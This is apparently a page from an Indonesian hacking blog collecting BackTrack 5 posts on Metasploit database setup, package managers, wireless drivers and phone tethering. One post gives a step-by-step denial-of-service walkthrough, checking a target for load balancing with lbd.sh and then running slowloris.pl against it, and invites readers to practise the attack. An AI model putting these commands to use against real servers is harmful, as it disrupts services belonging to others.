Disela-sela waktu senggang saya sering mengunjungi website exploit-db.com salah satu website arsip untuk ribuan exploits, disana juga ada beberapa papers atau articles yang dapat membantu sahabat untuk lebih memahami tentang Exploitasi. Saya kumpulkan kemudian terutama artikel yang ditulis dalam bahasa Indonesia.
Sebelumnya saya pernah menulis tutorial Install Postgresql di Backtrack 5 untuk dapat melakukan serangan menggunakan db_autopwn di Backtrack. Serangan dengan db_autopwn membuat kita menjadi lebih mudah untuk melakukan serangan. Disini saya menggunakan database "msfbook".
Serangan pada webserver banyak sekali dirasakan oleh pihak pengelola webserver, dan harus bekerja ekstra untuk memperbaiki semua sistem yang telah terkena serangan dos. Pernahkah sahabat melakukan serangan DOS kepada webserver? kalau belum mari kita latihan untuk melakukan serangan dos. Disini saya menggunakan 2 buah file yang pertama lbd.sh yang berguna untuk melihat apakah webserver tersebut menggunakan load-balancing atau tidak, yang kedua adalah slowloris.pl yang digunakan untuk melakukan serangan dos.
1. Download file lbd.sh dan slowloris.pl disini, kemudian unrar.
2. Cek Load-Balancing dari webserver target.
root@bt:~# cd dos
root@bt:~# ./lbd.sh IP_TARGET
Contoh :
root@bt:~/dos# ./lbd.sh 10.3.0.67
lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
Written by Stefan Behte (http://ge.mine.nu)
Proof-of-concept! Might give false positives.
Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]:
Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
NOT FOUND
Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND
Checking for HTTP-Loadbalancing [Diff]: NOT FOUND
10.3.0.67 does NOT use Load-balancing.
root@bt:~/dos#
Jika jawabannya adalah "10.3.0.67 does NOT use Load-balancing." maka kita akan melakukan serangan dos.
3. Serangan Dos.
root@bt:~/dos# ./slowloris.pl -dns IP_TARGET
* Untuk tipe serangan yang lain bisa dilihat didalam file slowloris.pl.
Berikut Videonya.
Update !
Mungkin dengan adanya artikel ini akan membuat beberapa webserver dirugikan, berikut beberapa tutorial yang saya kira dapat memberikan sedikit proteksi pada webservernya.
Beberapa dari sahabat mungkin pernah mendengar tentang db_autopwn yang biasanya menggunakan postgresql sebagai databasenya untuk melakukan serangan exploit, kelebihan menggunakan db_autopwn adalah kita dapat menggurangi penggunaan waktu untuk melakukan serangan.
root@bt:~# apt-get install libpgsql-ruby postgresql libpq-dev
root@bt:~# su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
exit
sh-4.1$ exit
exit
Dari tutorial diatas kita bisa melihat saya membuat database dengan nama metasploit.
Buat sahabat yang baru dan biasa menggunakan ubuntu, mungkin akan kesulitan untuk mengatur aplikasi didalam backtrack, oleh karena itu dibutuhkan aplikasi untuk mengatur hal tersebut seperti diubuntu, contohnya Synaptic Package Manager atau Ubuntu Software Center. Maka kita sekarang akan melakukan installasi pada kedua aplikasi tersebut pada Backtrack kita.
1. Install Synaptic Package Manager.
root@bt:~# apt-get install synaptic
Tampilan Synaptic Package Manager pada Backtrack 5 R1.
2. Buka System > Administration > Software Sources, pada tab Ubuntu Software centang semuanya opsi dari Downloadable from the Internet.
3. Install Ubuntu Software Center.
root@bt:~# apt-get install software-center
Tampilan Ubuntu Software Center pada Backtrack 5 R1.
Untuk tutorial install Ubuntu Tweak DiBacktrack bisa dicari pada kotak pencarian.
“The best guide to the Metasploit Framework.” —HD Moore, Founder of the Metasploit Project
Metasploit adalah aplikasi yang powerfull digunakan untuk melakukan aksi exploitasi. Digunakan pada semua kalangan mulai dari pemula sampai tingkat yang Profesional. Ebook Metasploit ini sangat berguna bagi sahabat-sahabat yang ingin serius mengeluti dunia exploitasi
Beberapa hari yang lalu ane lagi online, berhubung sinyal wireless lagi buruk(udah musin hujan), ane berencana mau keluarin itu wireless adapter yang tipe TL-WN321G, taruh diluar kamar,biar sinyal lebih oke,eh pas ane colokin kelaptop ternyata drivernya belum ada(Untuk versi Backtrack 4 kebawah driver rt73usb sudah disertakan didalamnya), akhirnya ane keliling dunia bersama om google untuk mencari pencerahan, dan akhirnya ketemulah didalam website resmi backtrack tentang patch pada driver wireless.
Sebelumnya ane kasih tau dulu drivers apa aja yang akan support jika dipatch
1. Wireless card yang support Injection
+ AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
+ AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
+ BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed
+ Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers -passed
+ Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers-passed
+ ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers -passed
+ Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers -passed
+ Ubiquiti SRC - using the mac80211 ath9k drivers-passed
+ Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers-passed
+ Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers-passed
+ Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers-passed
+ Netgear wg111v2 - using the mac80211 rtl8187 drivers-passed
+ ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed
+ Intel 4956/5xxx - using the iwlagn drivers - passed
2. Wireless Card yang dapat berjalan tanpa Injection
Akhirnya ane bisa juga gunain itu wireless adapter, cukup gunakan perintah modprobe [nama_driver] contohnya untuk driver TL-WN321G yang menggunakan driver rt73usb :
Kemaren kebetulan wireless diasrama ane lagi error tuh, jadi terpaksa deh ane harus cari cara untuk bisa selancaran sebebas bebasnya didunia maya, pas nga sengaja liat hp(Samsung Galaxy Mini), ane jadi teringat kemaren diwendus sijelek(pacar ane gann,"_") dia bisa internetan pake hp + kabel micro usb, jadi ane yang menggunakan linux ngak mau kalah, ane coba untuk menyambungkan leptop dengan hp, kemudian ane coba-coba dan ternyata berhasil gan,hoho.. ni dibawah caranya :
1. Sambungkan Handphone Galaxy Mini dengan leptop(OS Backtrack)
2. Masuk kedalam pengaturan USB tethering Menu > Settings > Wireless and networks > Tethering and portable hotspot , Kemudian centang USB tethering
Selain melakukan klik pada iklan, cara yang termudah untuk bisa mendukung blog ini tetap eksis adalah dengan memasang link banner dibawah pada blog/situs sahabat. Jika ingin tukaran link bisa mengirimkan email ke : gilakomputer@gmail.com
Gambar
Kode
Receive all updates via Facebook. Just Click the Like Button Below
